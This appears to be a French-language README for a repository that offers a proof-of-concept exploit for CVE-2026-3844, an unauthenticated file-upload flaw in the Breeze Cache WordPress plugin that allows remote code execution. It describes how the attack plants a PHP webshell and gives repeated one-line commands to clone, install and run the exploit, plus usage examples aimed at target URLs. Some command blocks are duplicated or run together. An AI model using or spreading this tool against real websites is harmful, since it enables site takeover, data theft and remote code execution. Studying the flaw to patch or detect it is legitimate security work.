
Exploit PoC pour CVE-2026-3844, une vulnérabilité critique de téléversement de fichiers sans authentification dans le plugin WordPress Breeze menant à une RCE.
Exploit PoC pour CVE-2026-3844, une vulnérabilité critique de téléversement de fichier sans authentification dans le plugin WordPress Breeze menant à une RCE.
CVE-2026-3844 est une vulnérabilité CRITIQUE de téléversement arbitraire de fichier sans authentification dans le plugin WordPress Breeze Cache (par Cloudways), affectant toutes les versions jusqu'à la 2.4.4 incluse.
Ce dépôt fournit un exploit Proof of Concept (PoC) (CVE-2026-3844.py) pour la recherche en sécurité autorisée, les tests d'intrusion et la divulgation responsable.
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
| Champ | Détails |
|---|---|
| ID CVE | CVE-2026-3844 |
| Plugin | Breeze Cache (par Cloudways) |
| Versions affectées | Toutes les versions ≤ 2.4.4 |
| Version corrigée | Breeze 2.4.5+ |
| Type de vulnérabilité | CWE-434 — Téléversement sans restriction de fichier de type dangereux |
| Score CVSS v3.1 | 9.8 (CRITIQUE) |
| Score CVSS v2.0 | 10.0 (CRITIQUE) |
| Vecteur CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Vecteur d'attaque | Réseau (à distance) |
| Authentification requise | ❌ Aucune — Non authentifiée |
| Condition | "Host Files Locally – Gravatars" doit être activée (désactivée par défaut) |
| Impact | Confidentialité : ÉLEVÉE · Intégrité : ÉLEVÉE · Disponibilité : ÉLEVÉE |
| Publié | 2026-04-23 |
| Source | Wordfence / NVD / MITRE |
| PoC | Tausif Zaman |
Le plugin Breeze Cache pour WordPress récupère les images Gravatar distantes et les stocke localement lorsque la fonctionnalité "Host Files Locally – Gravatars" est activée. La fonction vulnérable fetch_gravatar_from_remote dans class-breeze-cache-cronjobs.php (lignes 89–119) n'effectue aucune validation du type de fichier ou de l'extension sur le contenu distant récupéré.
class-breeze-cache-cronjobs.php
└── fetch_gravatar_from_remote() ← ❌ No file type validation
└── Saves remote content directly to disk
└── Attacker controls → uploads .php webshell → RCE
Attacker (Unauthenticated)
│
▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
│
▼
Plugin fetches & saves the .php file without validation
│
▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
│
▼
Attacker accesses webshell → Full RCE achieved
En cas d'exploitation réussie, un attaquant peut :
requests# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
python3 CVE-2026-3844.py
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]
CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (e.g. https://target.com)
-t TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT Save webshell path to output file
-v, --verbose Enable verbose/debug output
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v